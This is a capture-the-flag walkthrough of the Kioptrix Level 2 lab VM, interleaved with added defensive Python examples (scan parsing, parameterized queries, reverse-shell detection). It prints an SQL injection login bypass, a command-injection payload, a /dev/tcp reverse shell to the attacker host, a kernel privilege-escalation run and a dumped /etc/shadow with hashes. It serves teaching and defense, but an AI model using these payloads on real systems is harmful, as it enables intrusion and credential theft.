Kioptrix 2 Walkthrough (Vulnhub)

2020/09/01 22:35 · Kioptrix · Original article · 2,814 · 0

Introduction

KIOPTRIX VM IMAGE CHALLENGE:
This Kioptrix VM image is an easy challenge. The object of the game is to acquire root access by any means possible (except actually hacking the VM server or the player). The purpose of these games is to learn the basic tools and techniques of vulnerability assessment and exploitation. There is more than one way to complete the challenge successfully.
Source: http://www.kioptrix.com/blog/?page_id=135
Source: http://www.kioptrix.com/blog/?p=49
This is the second release of #2. The first release had a bug in the web application.
2012-02-09: re-released
2011-02-11: original release

Environment Setup

Visit https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ to download the VM image.

Hands-on Penetration

Scan the target subnet with nmap to find live hosts:

xiaoze@bad:~$ nmap 192.168.2.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:15 CST
Nmap scan report for RM2100.lan (192.168.2.1)
Host is up (0.0037s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
1080/tcp open  socks

Nmap scan report for chuangmi-plug-v3_miap5EDA.lan (192.168.2.100)
Host is up (0.014s latency).
All 1000 scanned ports on chuangmi-plug-v3_miap5EDA.lan (192.168.2.100) are closed

Nmap scan report for lumi-acpartner-mcn02_miap9740.lan (192.168.2.108)
Host is up (0.0078s latency).
All 1000 scanned ports on lumi-acpartner-mcn02_miap9740.lan (192.168.2.108) are closed

Nmap scan report for MiAiSoundbox.lan (192.168.2.117)
Host is up (0.0036s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
9999/tcp open  abyss

Nmap scan report for zedeMacBook-Pro.lan (192.168.2.120)
Host is up (0.30s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for bad.lan (192.168.2.133)
Host is up (0.00027s latency).
All 1000 scanned ports on bad.lan (192.168.2.133) are closed

Nmap scan report for lumi-gateway-v3_miio87687718.lan (192.168.2.153)
Host is up (0.0095s latency).
All 1000 scanned ports on lumi-gateway-v3_miio87687718.lan (192.168.2.153) are closed

Nmap scan report for 192.168.2.161
Host is up (0.0028s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql

Nmap scan report for MIX2S-ouyangxiaozede.lan (192.168.2.235)
Host is up (0.0060s latency).
All 1000 scanned ports on MIX2S-ouyangxiaozede.lan (192.168.2.235) are closed

Nmap done: 256 IP addresses (9 hosts up) scanned in 18.32 seconds

The target host is 192.168.2.161. Run a SYN scan with service and OS detection against it:

xiaoze@bad:~$ sudo nmap -sS -sV -O  192.168.2.161
[sudo] xiaoze 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:20 CST
Nmap scan report for 192.168.2.161
Host is up (0.00086s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
631/tcp  open  ipp        CUPS 1.1
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:E1:BD:4F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.10 seconds
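Picking the target out of a subnet sweep by hand works for nine hosts; for larger scans it helps to parse nmap's normal output into a table and filter by exposed service. The following is an added example written for this walkthrough, not code from the original post or from the Nmap project. It assumes nmap's default "normal" output format (the "Nmap scan report for" and "PORT STATE SERVICE" lines shown above); the sample input is constructed from a trimmed copy of the sweep above.

```python
import re
from typing import Dict, List, Tuple

# Sample input constructed from the scan output above (a few host blocks only).
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:15 CST
Nmap scan report for RM2100.lan (192.168.2.1)
Host is up (0.0037s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
1080/tcp open  socks

Nmap scan report for bad.lan (192.168.2.133)
Host is up (0.00027s latency).
All 1000 scanned ports on bad.lan (192.168.2.133) are closed

Nmap scan report for 192.168.2.161
Host is up (0.0028s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql

Nmap done: 256 IP addresses (9 hosts up) scanned in 18.32 seconds
"""

# Matches "Nmap scan report for NAME (IP)" as well as "Nmap scan report for IP".
HOST_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?$"
)
# Matches port lines such as "80/tcp   open  http".
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")


def parse_nmap(text: str) -> Dict[str, dict]:
    """Map each scanned IP to its hostname (None if nmap printed only the IP)
    and the list of (port, service) pairs whose state is 'open'."""
    hosts: Dict[str, dict] = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = {"name": m.group("name"), "open_ports": []}
            hosts[m.group("ip")] = current
            continue
        if current is None:
            continue  # banner lines before the first host block
        m = PORT_RE.match(line)
        if m and m.group("state") == "open":
            current["open_ports"].append((int(m.group("port")), m.group("service")))
    return hosts


def candidate_targets(hosts: Dict[str, dict], required=("http",)) -> List[str]:
    """IPs exposing every service named in `required`, most exposed (most open ports) first."""
    picked: List[Tuple[str, int]] = []
    for ip, info in hosts.items():
        services = {svc for _, svc in info["open_ports"]}
        if all(s in services for s in required):
            picked.append((ip, len(info["open_ports"])))
    return [ip for ip, _ in sorted(picked, key=lambda t: (-t[1], t[0]))]


if __name__ == "__main__":
    scanned = parse_nmap(SAMPLE_NMAP_OUTPUT)
    for ip in candidate_targets(scanned):
        ports = ", ".join(f"{p}/{s}" for p, s in scanned[ip]["open_ports"])
        print(f"{ip:16} {scanned[ip]['name'] or '-':12} {ports}")
```

Hosts with no open ports are kept in the table (with an empty list) so that the output still accounts for every live host, which matters when the same parser is reused for an exposure inventory rather than target selection.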

Port 80 is open with a web service, and as a web guy, a web app is always where I start. Opening http://192.168.2.161 shows the following page:

Logging in with the weak credentials admin:admin gives a wrong-password error; the universal password admin' or 1=1 -- - logs in successfully.

Entering baidu.com;ls -la in the input box shows that the ls -la command is executed.
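Both of the web bugs above come from the same mistake: user input is pasted into a string that is then interpreted by another engine (SQL in the login, /bin/sh in the ping box). The following is an added example written for this walkthrough, not the target application's code; it is in Python with an in-memory sqlite3 table so it runs stand-alone, and the user record, the table layout and the ping helper names are all assumptions. It shows why the page's two payloads work against the concatenating versions and why they do nothing against the parameterized query and the allowlisted argv list.

```python
import re
import shlex
import sqlite3
from typing import List, Optional


def make_db() -> sqlite3.Connection:
    """In-memory users table standing in for the app's database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cretPassw0rd')")  # constructed
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Query assembled by string formatting: whatever the user types becomes part of the SQL,
    so admin' or 1=1 -- - turns the WHERE clause into a tautology and comments out the rest."""
    sql = "SELECT username FROM users WHERE username='%s' AND password='%s'" % (username, password)
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized query: the inputs are bound as values and cannot change the statement."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Hostname or dotted IPv4 only: dot-separated labels of letters, digits and inner hyphens.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def ping_command_vulnerable(target: str) -> str:
    """The single string a naive implementation hands to /bin/sh via system() or shell=True."""
    return "ping -c 3 " + target


def shell_command_count(cmdline: str) -> int:
    """How many simple commands a POSIX shell would run for this string (1 means no injection).
    shlex with punctuation_chars splits ; | & into their own tokens even without spaces."""
    lexer = shlex.shlex(cmdline, punctuation_chars=True)
    count = 1
    for token in lexer:
        if token in (";", "|", "&", "&&", "||", "|&"):
            count += 1
    return count


def ping_argv_fixed(target: str) -> Optional[List[str]]:
    """Allowlist-validate the target and return an argv list for subprocess.run (no shell),
    or None when the input is not a plain hostname/IP. A leading '-' also fails, so the
    target cannot be turned into an extra ping option either."""
    if not HOST_RE.match(target):
        return None
    return ["ping", "-c", "3", target]


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or 1=1 -- -"
    print("vulnerable login with payload:", login_vulnerable(db, payload, "anything"))  # True
    print("fixed login with payload:     ", login_fixed(db, payload, "anything"))       # False
    injected = "baidu.com;ls -la"
    print("commands the shell would run: ", shell_command_count(ping_command_vulnerable(injected)))  # 2
    print("argv after validation:        ", ping_argv_fixed(injected))  # None
    print("argv for a clean target:      ", ping_argv_fixed("127.0.0.1"))
```

The argv list is returned rather than executed so the example runs offline; in a real handler it goes to subprocess.run(argv) without shell=True, and the validation still matters because an argv list stops shell metacharacters but not option injection on its own.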

Use nc to catch a reverse shell:

127.0.0.1; bash -i >& /dev/tcp/192.168.2.133/8877 0>&1

The reverse shell comes back; check the Linux kernel version.

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
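From the defender's side, the session above has a distinctive shape: the web server's worker (uid 48, apache) spawned sh, which spawned an interactive bash with a /dev/tcp redirection. That parent chain is the thing to detect. The following is an added example written for this walkthrough, not part of the original post; it runs the check over a constructed `ps -eo user,pid,ppid,args` listing that mirrors the reverse shell used above, and the process names, PIDs and indicator list are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample in `ps -eo user,pid,ppid,args` format. The two apache-owned
# shell lines mirror the /dev/tcp reverse shell used above; the rest is filler.
SAMPLE_PS = """\
USER       PID  PPID ARGS
root         1     0 init [3]
root      1890     1 /usr/sbin/sshd
root      2211     1 /usr/sbin/httpd
apache    2215  2211 /usr/sbin/httpd
apache    2216  2211 /usr/sbin/httpd
apache    3102  2216 sh -c ping -c 3 127.0.0.1; bash -i >& /dev/tcp/192.168.2.133/8877 0>&1
apache    3103  3102 bash -i
"""


@dataclass
class Proc:
    user: str
    pid: int
    ppid: int
    args: str


WEB_SERVERS = {"httpd", "apache2", "nginx", "php-fpm"}
SHELLS = {"sh", "bash", "dash"}
# Heuristic command-line indicators; each is a reason to look, not proof on its own.
INDICATORS = {
    "bash /dev/tcp or /dev/udp redirection": re.compile(r"/dev/(?:tcp|udp)/"),
    "interactive shell requested (bash -i)": re.compile(r"\bbash -i\b"),
    "netcat with -e": re.compile(r"\bnc\b.*\s-e\s"),
}


def parse_ps(text: str) -> Dict[int, Proc]:
    """Parse `ps -eo user,pid,ppid,args` output (header skipped) into a pid-indexed table."""
    procs: Dict[int, Proc] = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)  # args may contain spaces, so split at most 3 times
        if len(parts) < 4:
            continue
        user, pid, ppid, args = parts
        procs[int(pid)] = Proc(user, int(pid), int(ppid), args)
    return procs


def basename(args: str) -> str:
    """Program name from an args string: first word with any path stripped."""
    return args.split()[0].rsplit("/", 1)[-1]


def has_web_ancestor(procs: Dict[int, Proc], pid: int) -> bool:
    """True if pid itself or any of its ancestors is a web server process."""
    seen = set()
    cur = procs.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        if basename(cur.args) in WEB_SERVERS:
            return True
        cur = procs.get(cur.ppid)
    return False


def find_suspicious(procs: Dict[int, Proc]) -> List[dict]:
    """Flag shells descended from a web server and any process whose command line
    carries a reverse-shell indicator, with the reasons attached for triage."""
    findings = []
    for p in procs.values():
        reasons = []
        if basename(p.args) in SHELLS and has_web_ancestor(procs, p.ppid):
            reasons.append("shell spawned under a web server process")
        for label, pat in INDICATORS.items():
            if pat.search(p.args):
                reasons.append(label)
        if reasons:
            findings.append({"pid": p.pid, "user": p.user, "args": p.args, "reasons": reasons})
    return sorted(findings, key=lambda f: f["pid"])


if __name__ == "__main__":
    for f in find_suspicious(parse_ps(SAMPLE_PS)):
        print(f"pid {f['pid']} ({f['user']}): {f['args']}")
        for r in f["reasons"]:
            print("   -", r)
```

The parent-chain rule fires even when the command line carries no indicator at all (a plain `sh -c ls -la` from the ping box is still a shell under httpd), which is why it is kept separate from the pattern list; in production the same logic is easier to feed from auditd execve records than from periodic ps snapshots.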

Linux privilege escalation: look in exploit-db for a matching exploit for this kernel.

A quick Google search turns up https://www.exploit-db.com/exploits/9542, which works for privilege escalation here.

Just wget it onto the target; in my case the download did not work directly, so I fetched it from a local web server instead.

bash-3.00$ gcc 9542.c -o exploit
9542.c:109:28: warning: no newline at end of file
bash-3.00$ chmod 777 exploit
bash-3.00$ ./exploit
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
sh-3.00# cat /etc/shadow
root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
bin:*:14525:0:99999:7:::
daemon:*:14525:0:99999:7:::
adm:*:14525:0:99999:7:::
lp:*:14525:0:99999:7:::
sync:*:14525:0:99999:7:::
shutdown:*:14525:0:99999:7:::
halt:*:14525:0:99999:7:::
mail:*:14525:0:99999:7:::
news:*:14525:0:99999:7:::
uucp:*:14525:0:99999:7:::
operator:*:14525:0:99999:7:::
games:*:14525:0:99999:7:::
gopher:*:14525:0:99999:7:::
ftp:*:14525:0:99999:7:::
nobody:*:14525:0:99999:7:::
dbus:!!:14525:0:99999:7:::
vcsa:!!:14525:0:99999:7:::
rpm:!!:14525:0:99999:7:::
haldaemon:!!:14525:0:99999:7:::
netdump:!!:14525:0:99999:7:::
nscd:!!:14525:0:99999:7:::
sshd:!!:14525:0:99999:7:::
rpc:!!:14525:0:99999:7:::
mailnull:!!:14525:0:99999:7:::
smmsp:!!:14525:0:99999:7:::
rpcuser:!!:14525:0:99999:7:::
nfsnobody:!!:14525:0:99999:7:::
pcap:!!:14525:0:99999:7:::
apache:!!:14525:0:99999:7:::
squid:!!:14525:0:99999:7:::
webalizer:!!:14525:0:99999:7:::
xfs:!!:14525:0:99999:7:::
ntp:!!:14525:0:99999:7:::
pegasus:!!:14525:0:99999:7:::
mysql:!!:14525::::::
john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::
sh-3.00# 

Article URL: http://www.ouyangxiaoze.com/2020/09/663.html
Copyright: this is an original article and the copyright belongs to 欧阳小泽. Sharing is welcome; please keep the source when reposting!
